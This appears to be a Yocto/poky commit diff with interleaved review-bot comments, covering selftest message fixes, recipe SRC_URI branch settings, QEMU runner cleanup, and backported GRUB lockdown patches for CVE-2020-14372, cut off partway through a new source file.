+++ b/poky/meta/lib/oeqa/selftest/cases/sstatetests.py @@ -39,7 +39,7 @@ class SStateTests(SStateBase): recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb') os.makedirs(os.path.dirname(recipefile)) - srcuri = 'git://' + srcdir + ';protocol=file' + srcuri = 'git://' + srcdir + ';protocol=file;branch=master' result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri]) self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output) @@ -137,7 +137,7 @@ class SStateTests(SStateBase): filtered_results.append(r) self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results))) file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False) - self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets))) + self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets))) self.track_for_cleanup(self.distro_specific_sstate + "_old") shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old") 
@@ -146,13 +146,13 @@ class SStateTests(SStateBase): bitbake(['-cclean'] + targets) bitbake(targets) file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False) - self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets))) + self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets))) not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2] - self.assertTrue(not_recreated == [], msg="The following sstate files ware not recreated: %s" % ', '.join(map(str, not_recreated))) + self.assertTrue(not_recreated == [], msg="The following sstate files were not recreated: %s" % ', '.join(map(str, not_recreated))) created_once = [x for x in file_tracker_2 if x not in file_tracker_1] - self.assertTrue(created_once == [], msg="The following sstate files ware created only in the second run: %s" % ', '.join(map(str, created_once))) + self.assertTrue(created_once == [], msg="The following sstate files were created only in the second run: %s" % ', '.join(map(str, created_once))) def test_rebuild_distro_specific_sstate_cross_native_targets(self): self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True) 
@@ -202,9 +202,9 @@ class SStateTests(SStateBase): actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)] actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate] - self.assertFalse(actual_not_expected, msg="Files should have been removed but ware not: %s" % ', '.join(map(str, actual_not_expected))) + self.assertFalse(actual_not_expected, msg="Files should have been removed but were not: %s" % ', '.join(map(str, actual_not_expected))) expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate] - self.assertFalse(expected_not_actual, msg="Extra files ware removed: %s" ', '.join(map(str, expected_not_actual))) + self.assertFalse(expected_not_actual, msg="Extra files were removed: %s" ', '.join(map(str, expected_not_actual))) def test_sstate_cache_management_script_using_pr_1(self): global_config = [] diff --git a/poky/meta/lib/oeqa/selftest/cases/tinfoil.py b/poky/meta/lib/oeqa/selftest/cases/tinfoil.py index a51c6048d3..4fcbe594c9 100644 --- a/poky/meta/lib/oeqa/selftest/cases/tinfoil.py +++ b/poky/meta/lib/oeqa/selftest/cases/tinfoil.py @@ -94,16 +94,15 @@ class TinfoilTests(OESelftestTestCase): pass pattern = 'conf' - res = tinfoil.run_command('findFilesMatchingInDir', pattern, 'conf/machine') + res = tinfoil.run_command('testCookerCommandEvent', pattern) self.assertTrue(res) eventreceived = False commandcomplete = False start = time.time() - # Wait for maximum 60s in total so we'd detect spurious heartbeat events for example - # The test is IO load sensitive too + # Wait for maximum 120s in total so we'd detect spurious heartbeat events for example while (not (eventreceived == True and commandcomplete == True) - and (time.time() - start < 60)): + and (time.time() - start < 120)): # if we received both events (on let's say a good day), we are done event = tinfoil.wait_event(1) if event: 
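Review bot: The last changed line of this sstatetests.py hunk still lacks the `%` operator: `msg="Extra files were removed: %s" ', '.join(...)` is parsed as implicit string-literal concatenation, so the file names end up joined by the text `Extra files were removed: %s, ` instead of being formatted into the message. The typo fix touches the line without correcting that; it should read `msg="Extra files were removed: %s" % ', '.join(map(str, expected_not_actual))`, matching the assertFalse just above it. The enclosing test method starts and ends outside the hunk.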
@@ -111,7 +110,8 @@ class TinfoilTests(OESelftestTestCase): commandcomplete = True elif isinstance(event, bb.event.FilesMatchingFound): self.assertEqual(pattern, event._pattern) - self.assertIn('qemuarm.conf', event._matches) + self.assertIn('A', event._matches) + self.assertIn('B', event._matches) eventreceived = True elif isinstance(event, logging.LogRecord): continue diff --git a/poky/meta/lib/oeqa/utils/buildproject.py b/poky/meta/lib/oeqa/utils/buildproject.py index e6d80cc8dc..dfb9661868 100644 --- a/poky/meta/lib/oeqa/utils/buildproject.py +++ b/poky/meta/lib/oeqa/utils/buildproject.py @@ -18,6 +18,7 @@ class BuildProject(metaclass=ABCMeta): def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None): self.uri = uri self.archive = os.path.basename(uri) + self.tempdirobj = None if not tmpdir: self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-') tmpdir = self.tempdirobj.name @@ -57,6 +58,8 @@ class BuildProject(metaclass=ABCMeta): return self._run('cd %s; make install %s' % (self.targetdir, install_args)) def clean(self): + if self.tempdirobj: + self.tempdirobj.cleanup() if not self.needclean: return self._run('rm -rf %s' % self.targetdir) diff --git a/poky/meta/lib/oeqa/utils/qemurunner.py b/poky/meta/lib/oeqa/utils/qemurunner.py index 79db2cc247..de0dff3ff0 100644 --- a/poky/meta/lib/oeqa/utils/qemurunner.py +++ b/poky/meta/lib/oeqa/utils/qemurunner.py @@ -120,7 +120,10 @@ class QemuRunner: import fcntl fl = fcntl.fcntl(o, fcntl.F_GETFL) fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK) - return os.read(o.fileno(), 1000000).decode("utf-8") + try: + return os.read(o.fileno(), 1000000).decode("utf-8") + except BlockingIOError: + return "" def handleSIGCHLD(self, signum, frame): 
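Review bot: In the qemurunner.py getOutput() hunk, `os.read(o.fileno(), 1000000).decode("utf-8")` can still raise UnicodeDecodeError when the read ends inside a multi-byte sequence or the output contains non-UTF-8 bytes, and only BlockingIOError is caught. That matters more after this commit, because stop() now calls getOutput() on runqemu.stdout ahead of `self.runqemu.stdin.close()` and `self.runqemu.stdout.close()` (the `@@ -435,6 +438,8 @@` hunk), so a decode error there would skip closing the pipes. Decoding leniently avoids it: `return os.read(o.fileno(), 1000000).decode("utf-8", errors="replace")`. getOutput() begins above the hunk.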
@@ -231,7 +234,7 @@ class QemuRunner: r = os.fdopen(r) x = r.read() os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM) - sys.exit(0) + os._exit(0) self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid) self.logger.debug("waiting at most %s seconds for qemu pid (%s)" % @@ -435,6 +438,8 @@ class QemuRunner: if self.runqemu.poll() is None: self.logger.debug("Sending SIGKILL to runqemu") os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL) + if not self.runqemu.stdout.closed: + self.logger.info("Output from runqemu:\n%s" % self.getOutput(self.runqemu.stdout)) self.runqemu.stdin.close() self.runqemu.stdout.close() self.runqemu_exited = True diff --git a/poky/meta/lib/oeqa/utils/targetbuild.py b/poky/meta/lib/oeqa/utils/targetbuild.py index 1055810ca3..09738add1d 100644 --- a/poky/meta/lib/oeqa/utils/targetbuild.py +++ b/poky/meta/lib/oeqa/utils/targetbuild.py @@ -19,6 +19,7 @@ class BuildProject(metaclass=ABCMeta): self.d = d self.uri = uri self.archive = os.path.basename(uri) + self.tempdirobj = None if not tmpdir: tmpdir = self.d.getVar('WORKDIR') if not tmpdir: @@ -71,9 +72,10 @@ class BuildProject(metaclass=ABCMeta): return self._run('cd %s; make install %s' % (self.targetdir, install_args)) def clean(self): + if self.tempdirobj: + self.tempdirobj.cleanup() self._run('rm -rf %s' % self.targetdir) subprocess.check_call('rm -f %s' % self.localarchive, shell=True) - pass class TargetBuildProject(BuildProject): diff --git a/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb b/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb index 5d6f200a73..e9dfa0770e 100644 --- a/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb +++ b/poky/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb 
@@ -10,7 +10,7 @@ DEPENDS = "efivar popt" COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux" -SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https \ +SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https;branch=master \ file://0001-remove-extra-decl.patch \ file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \ " diff --git a/poky/meta/recipes-bsp/efivar/efivar_37.bb b/poky/meta/recipes-bsp/efivar/efivar_37.bb index 5bf121ff6e..fa1fe1ecdf 100644 --- a/poky/meta/recipes-bsp/efivar/efivar_37.bb +++ b/poky/meta/recipes-bsp/efivar/efivar_37.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=6626bb1e20189cfa95f2c508ba286393" COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux" -SRC_URI = "git://github.com/rhinstaller/efivar.git \ +SRC_URI = "git://github.com/rhinstaller/efivar.git;branch=master;protocol=https \ file://determinism.patch \ file://no-werror.patch" SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10" diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372.patch new file mode 100644 index 0000000000..08e7666cde --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372.patch 
@@ -0,0 +1,76 @@ +From 0d237c0b90f0c6d4a3662c569b2371ae3ed69574 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Mon, 28 Sep 2020 20:08:41 +0200 +Subject: [PATCH] acpi: Don't register the acpi command when locked down +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The command is not allowed when lockdown is enforced. Otherwise an +attacker can instruct the GRUB to load an SSDT table to overwrite +the kernel lockdown configuration and later load and execute +unsigned code. + +Fixes: CVE-2020-14372 + +Reported-by: Máté Kukri <km@mkukri.xyz> +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3e8e4c0549240fa209acffceb473e1e509b50c95] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 5 +++++ + grub-core/commands/acpi.c | 15 ++++++++------- + 2 files changed, 13 insertions(+), 7 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index 0786427..47ac7ff 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -3986,6 +3986,11 @@ Normally, this command will replace the Root System Description Pointer + (RSDP) in the Extended BIOS Data Area to point to the new tables. If the + @option{--no-ebda} option is used, the new tables will be known only to + GRUB, but may be used by GRUB's EFI emulation. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ Otherwise an attacker can instruct the GRUB to load an SSDT table to ++ overwrite the kernel lockdown configuration and later load and execute ++ unsigned code. 
+ @end deffn + + +diff --git a/grub-core/commands/acpi.c b/grub-core/commands/acpi.c +index 5a1499a..1215f2a 100644 +--- a/grub-core/commands/acpi.c ++++ b/grub-core/commands/acpi.c +@@ -27,6 +27,7 @@ + #include <grub/mm.h> + #include <grub/memory.h> + #include <grub/i18n.h> ++#include <grub/lockdown.h> + + #ifdef GRUB_MACHINE_EFI + #include <grub/efi/efi.h> +@@ -775,13 +776,13 @@ static grub_extcmd_t cmd; + + GRUB_MOD_INIT(acpi) + { +- cmd = grub_register_extcmd ("acpi", grub_cmd_acpi, 0, +- N_("[-1|-2] [--exclude=TABLE1,TABLE2|" +- "--load-only=TABLE1,TABLE2] FILE1" +- " [FILE2] [...]"), +- N_("Load host ACPI tables and tables " +- "specified by arguments."), +- options); ++ cmd = grub_register_extcmd_lockdown ("acpi", grub_cmd_acpi, 0, ++ N_("[-1|-2] [--exclude=TABLE1,TABLE2|" ++ "--load-only=TABLE1,TABLE2] FILE1" ++ " [FILE2] [...]"), ++ N_("Load host ACPI tables and tables " ++ "specified by arguments."), ++ options); + } + + GRUB_MOD_FINI(acpi) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch new file mode 100644 index 0000000000..745f335501 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch 
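Review bot: The apply order of the three CVE-2020-14372 patches is not evident from their file names. This file calls `grub_register_extcmd_lockdown()` and includes `<grub/lockdown.h>`, which exist only after CVE-2020-14372_2.patch, and that patch in turn builds on CVE-2020-14372_1.patch, so the grub recipe's SRC_URI has to list _1, then _2, then this file; the recipe change is not visible in this part of the commit. The restriction also takes effect only once something calls `grub_lockdown()`, and no caller appears in the patches shown here. It is worth confirming that the series carries the change that enables lockdown under UEFI Secure Boot, since otherwise `grub_is_lockdown()` stays `GRUB_LOCKDOWN_DISABLED` and `acpi` is registered as before.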
@@ -0,0 +1,130 @@ +From fe7a13df6200bda934fcc0246458df249f1ef4f2 Mon Sep 17 00:00:00 2001 +From: Marco A Benatto <mbenatto@redhat.com> +Date: Wed, 23 Sep 2020 11:33:33 -0400 +Subject: [PATCH] verifiers: Move verifiers API to kernel image + +Move verifiers API from a module to the kernel image, so it can be +used there as well. There are no functional changes in this patch. + +Signed-off-by: Marco A Benatto <mbenatto@redhat.com> +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9e95f45ceeef36fcf93cbfffcf004276883dbc99] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/Makefile.am | 1 + + grub-core/Makefile.core.def | 6 +----- + grub-core/kern/main.c | 4 ++++ + grub-core/{commands => kern}/verifiers.c | 8 ++------ + include/grub/verify.h | 9 ++++++--- + 5 files changed, 14 insertions(+), 14 deletions(-) + rename grub-core/{commands => kern}/verifiers.c (97%) + +diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am +index 3ea8e7f..375c30d 100644 +--- a/grub-core/Makefile.am ++++ b/grub-core/Makefile.am +@@ -90,6 +90,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/parser.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/partition.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/term.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/time.h ++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/verify.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/mm_private.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/net.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/memory.h +diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def +index 474a63e..cff02f2 100644 +--- a/grub-core/Makefile.core.def ++++ b/grub-core/Makefile.core.def +@@ -140,6 +140,7 @@ kernel = { + common = kern/rescue_parser.c; + common = kern/rescue_reader.c; + 
common = kern/term.c; ++ common = kern/verifiers.c; + + noemu = kern/compiler-rt.c; + noemu = kern/mm.c; +@@ -942,11 +943,6 @@ module = { + cppflags = '-I$(srcdir)/lib/posix_wrap'; + }; + +-module = { +- name = verifiers; +- common = commands/verifiers.c; +-}; +- + module = { + name = shim_lock; + common = commands/efi/shim_lock.c; +diff --git a/grub-core/kern/main.c b/grub-core/kern/main.c +index 9cad0c4..73967e2 100644 +--- a/grub-core/kern/main.c ++++ b/grub-core/kern/main.c +@@ -29,6 +29,7 @@ + #include <grub/command.h> + #include <grub/reader.h> + #include <grub/parser.h> ++#include <grub/verify.h> + + #ifdef GRUB_MACHINE_PCBIOS + #include <grub/machine/memory.h> +@@ -274,6 +275,9 @@ grub_main (void) + grub_printf ("Welcome to GRUB!\n\n"); + grub_setcolorstate (GRUB_TERM_COLOR_STANDARD); + ++ /* Init verifiers API. */ ++ grub_verifiers_init (); ++ + grub_load_config (); + + grub_boot_time ("Before loading embedded modules."); +diff --git a/grub-core/commands/verifiers.c b/grub-core/kern/verifiers.c +similarity index 97% +rename from grub-core/commands/verifiers.c +rename to grub-core/kern/verifiers.c +index 0dde481..aa3dc7c 100644 +--- a/grub-core/commands/verifiers.c ++++ b/grub-core/kern/verifiers.c +@@ -217,12 +217,8 @@ grub_verify_string (char *str, enum grub_verify_string_type type) + return GRUB_ERR_NONE; + } + +-GRUB_MOD_INIT(verifiers) ++void ++grub_verifiers_init (void) + { + grub_file_filter_register (GRUB_FILE_FILTER_VERIFY, grub_verifiers_open); + } +- +-GRUB_MOD_FINI(verifiers) +-{ +- grub_file_filter_unregister (GRUB_FILE_FILTER_VERIFY); +-} +diff --git a/include/grub/verify.h b/include/grub/verify.h +index ea04914..cd129c3 100644 +--- a/include/grub/verify.h ++++ b/include/grub/verify.h +@@ -64,7 +64,10 @@ struct grub_file_verifier + grub_err_t (*verify_string) (char *str, enum grub_verify_string_type type); + }; + +-extern struct grub_file_verifier *grub_file_verifiers; ++extern struct grub_file_verifier *EXPORT_VAR (grub_file_verifiers); ++ 
++extern void ++grub_verifiers_init (void); + + static inline void + grub_verifier_register (struct grub_file_verifier *ver) +@@ -78,7 +81,7 @@ grub_verifier_unregister (struct grub_file_verifier *ver) + grub_list_remove (GRUB_AS_LIST (ver)); + } + +-grub_err_t +-grub_verify_string (char *str, enum grub_verify_string_type type); ++extern grub_err_t ++EXPORT_FUNC (grub_verify_string) (char *str, enum grub_verify_string_type type); + + #endif /* ! GRUB_VERIFY_HEADER */ diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch new file mode 100644 index 0000000000..a98b5d0455 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch 
@@ -0,0 +1,431 @@ +From d8aac4517fef0f0188a60a2a8ff9cafdd9c7ca42 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Mon, 28 Sep 2020 20:08:02 +0200 +Subject: [PATCH] kern: Add lockdown support + +When the GRUB starts on a secure boot platform, some commands can be +used to subvert the protections provided by the verification mechanism and +could lead to booting untrusted system. + +To prevent that situation, allow GRUB to be locked down. That way the code +may check if GRUB has been locked down and further restrict the commands +that are registered or what subset of their functionality could be used. + +The lockdown support adds the following components: + +* The grub_lockdown() function which can be used to lockdown GRUB if, + e.g., UEFI Secure Boot is enabled. + +* The grub_is_lockdown() function which can be used to check if the GRUB + was locked down. + +* A verifier that flags OS kernels, the GRUB modules, Device Trees and ACPI + tables as GRUB_VERIFY_FLAGS_DEFER_AUTH to defer verification to other + verifiers. These files are only successfully verified if another registered + verifier returns success. Otherwise, the whole verification process fails. + + For example, PE/COFF binaries verification can be done by the shim_lock + verifier which validates the signatures using the shim_lock protocol. + However, the verification is not deferred directly to the shim_lock verifier. + The shim_lock verifier is hooked into the verification process instead. + +* A set of grub_{command,extcmd}_lockdown functions that can be used by + code registering command handlers, to only register unsafe commands if + the GRUB has not been locked down. 
+ +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=578c95298bcc46e0296f4c786db64c2ff26ce2cc] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + conf/Makefile.common | 2 + + docs/grub-dev.texi | 27 +++++++++++++ + docs/grub.texi | 8 ++++ + grub-core/Makefile.am | 5 ++- + grub-core/Makefile.core.def | 1 + + grub-core/commands/extcmd.c | 23 +++++++++++ + grub-core/kern/command.c | 24 +++++++++++ + grub-core/kern/lockdown.c | 80 +++++++++++++++++++++++++++++++++++++ + include/grub/command.h | 5 +++ + include/grub/extcmd.h | 7 ++++ + include/grub/lockdown.h | 44 ++++++++++++++++++++ + 11 files changed, 225 insertions(+), 1 deletion(-) + create mode 100644 grub-core/kern/lockdown.c + create mode 100644 include/grub/lockdown.h + +diff --git a/conf/Makefile.common b/conf/Makefile.common +index 6cd71cb..2a1a886 100644 +--- a/conf/Makefile.common ++++ b/conf/Makefile.common +@@ -84,7 +84,9 @@ CPPFLAGS_PARTTOOL_LIST = -Dgrub_parttool_register=PARTTOOL_LIST_MARKER + CPPFLAGS_TERMINAL_LIST = '-Dgrub_term_register_input(...)=INPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_TERMINAL_LIST += '-Dgrub_term_register_output(...)=OUTPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_COMMAND_LIST = '-Dgrub_register_command(...)=COMMAND_LIST_MARKER(__VA_ARGS__)' ++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_lockdown(...)=COMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd(...)=EXTCOMMAND_LIST_MARKER(__VA_ARGS__)' ++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd_lockdown(...)=EXTCOMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_p1(...)=P1COMMAND_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_FDT_LIST := '-Dgrub_fdtbus_register(...)=FDT_DRIVER_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_MARKER = $(CPPFLAGS_FS_LIST) 
$(CPPFLAGS_VIDEO_LIST) \ +diff --git a/docs/grub-dev.texi b/docs/grub-dev.texi +index ee389fd..635ec72 100644 +--- a/docs/grub-dev.texi ++++ b/docs/grub-dev.texi +@@ -86,6 +86,7 @@ This edition documents version @value{VERSION}. + * PFF2 Font File Format:: + * Graphical Menu Software Design:: + * Verifiers framework:: ++* Lockdown framework:: + * Copying This Manual:: Copying This Manual + * Index:: + @end menu +@@ -2086,6 +2087,32 @@ Optionally at the end of the file @samp{fini}, if it exists, is called with just + the context. If you return no error during any of @samp{init}, @samp{write} and + @samp{fini} then the file is considered as having succeded verification. + ++@node Lockdown framework ++@chapter Lockdown framework ++ ++The GRUB can be locked down, which is a restricted mode where some operations ++are not allowed. For instance, some commands cannot be used when the GRUB is ++locked down. ++ ++The function ++@code{grub_lockdown()} is used to lockdown GRUB and the function ++@code{grub_is_lockdown()} function can be used to check whether lockdown is ++enabled or not. When enabled, the function returns @samp{GRUB_LOCKDOWN_ENABLED} ++and @samp{GRUB_LOCKDOWN_DISABLED} when is not enabled. ++ ++The following functions can be used to register the commands that can only be ++used when lockdown is disabled: ++ ++@itemize ++ ++@item @code{grub_cmd_lockdown()} registers command which should not run when the ++GRUB is in lockdown mode. ++ ++@item @code{grub_cmd_lockdown()} registers extended command which should not run ++when the GRUB is in lockdown mode. ++ ++@end itemize ++ + @node Copying This Manual + @appendix Copying This Manual + +diff --git a/docs/grub.texi b/docs/grub.texi +index 8779507..d778bfb 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -5581,6 +5581,7 @@ environment variables and commands are listed in the same order. 
+ * Using digital signatures:: Booting digitally signed code + * UEFI secure boot and shim:: Booting digitally signed PE files + * Measured Boot:: Measuring boot components ++* Lockdown:: Lockdown when booting on a secure setup + @end menu + + @node Authentication and authorisation +@@ -5794,6 +5795,13 @@ into @file{core.img} in order to avoid a potential gap in measurement between + + Measured boot is currently only supported on EFI platforms. + ++@node Lockdown ++@section Lockdown when booting on a secure setup ++ ++The GRUB can be locked down when booted on a secure boot environment, for example ++if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will ++be restricted and some operations/commands cannot be executed. ++ + @node Platform limitations + @chapter Platform limitations + +diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am +index 375c30d..3096241 100644 +--- a/grub-core/Makefile.am ++++ b/grub-core/Makefile.am +@@ -79,6 +79,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/fs.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/i18n.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/kernel.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/list.h ++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/lockdown.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/misc.h + if COND_emu + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/compiler-rt-emu.h +@@ -376,8 +377,10 @@ command.lst: $(MARKER_FILES) + b=`basename $$pp .marker`; \ + sed -n \ + -e "/EXTCOMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \ ++ -e "/EXTCOMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \ + -e "/P1COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \ +- -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \ ++ -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" \ ++ -e "/COMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: 
$$b/;p;}" $$pp; \ + done) | sort -u > $@ + platform_DATA += command.lst + CLEANFILES += command.lst +diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def +index cff02f2..651ea2a 100644 +--- a/grub-core/Makefile.core.def ++++ b/grub-core/Makefile.core.def +@@ -204,6 +204,7 @@ kernel = { + efi = term/efi/console.c; + efi = kern/acpi.c; + efi = kern/efi/acpi.c; ++ efi = kern/lockdown.c; + i386_coreboot = kern/i386/pc/acpi.c; + i386_multiboot = kern/i386/pc/acpi.c; + i386_coreboot = kern/acpi.c; +diff --git a/grub-core/commands/extcmd.c b/grub-core/commands/extcmd.c +index 69574e2..90a5ca2 100644 +--- a/grub-core/commands/extcmd.c ++++ b/grub-core/commands/extcmd.c +@@ -19,6 +19,7 @@ + + #include <grub/mm.h> + #include <grub/list.h> ++#include <grub/lockdown.h> + #include <grub/misc.h> + #include <grub/extcmd.h> + #include <grub/script_sh.h> +@@ -110,6 +111,28 @@ grub_register_extcmd (const char *name, grub_extcmd_func_t func, + summary, description, parser, 1); + } + ++static grub_err_t ++grub_extcmd_lockdown (grub_extcmd_context_t ctxt __attribute__ ((unused)), ++ int argc __attribute__ ((unused)), ++ char **argv __attribute__ ((unused))) ++{ ++ return grub_error (GRUB_ERR_ACCESS_DENIED, ++ N_("%s: the command is not allowed when lockdown is enforced"), ++ ctxt->extcmd->cmd->name); ++} ++ ++grub_extcmd_t ++grub_register_extcmd_lockdown (const char *name, grub_extcmd_func_t func, ++ grub_command_flags_t flags, const char *summary, ++ const char *description, ++ const struct grub_arg_option *parser) ++{ ++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED) ++ func = grub_extcmd_lockdown; ++ ++ return grub_register_extcmd (name, func, flags, summary, description, parser); ++} ++ + void + grub_unregister_extcmd (grub_extcmd_t ext) + { +diff --git a/grub-core/kern/command.c b/grub-core/kern/command.c +index acd7218..4aabcd4 100644 +--- a/grub-core/kern/command.c ++++ b/grub-core/kern/command.c +@@ -17,6 +17,7 @@ + * along with GRUB. 
If not, see <http://www.gnu.org/licenses/>. + */ + ++#include <grub/lockdown.h> + #include <grub/mm.h> + #include <grub/command.h> + +@@ -77,6 +78,29 @@ grub_register_command_prio (const char *name, + return cmd; + } + ++static grub_err_t ++grub_cmd_lockdown (grub_command_t cmd __attribute__ ((unused)), ++ int argc __attribute__ ((unused)), ++ char **argv __attribute__ ((unused))) ++ ++{ ++ return grub_error (GRUB_ERR_ACCESS_DENIED, ++ N_("%s: the command is not allowed when lockdown is enforced"), ++ cmd->name); ++} ++ ++grub_command_t ++grub_register_command_lockdown (const char *name, ++ grub_command_func_t func, ++ const char *summary, ++ const char *description) ++{ ++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED) ++ func = grub_cmd_lockdown; ++ ++ return grub_register_command_prio (name, func, summary, description, 0); ++} ++ + void + grub_unregister_command (grub_command_t cmd) + { +diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c +new file mode 100644 +index 0000000..1e56c0b +--- /dev/null ++++ b/grub-core/kern/lockdown.c +@@ -0,0 +1,80 @@ ++/* ++ * GRUB -- GRand Unified Bootloader ++ * Copyright (C) 2020 Free Software Foundation, Inc. ++ * ++ * GRUB is free software: you can redistribute it and/or modify ++ * it under the terms of the GNU General Public License as published by ++ * the Free Software Foundation, either version 3 of the License, or ++ * (at your option) any later version. ++ * ++ * GRUB is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * 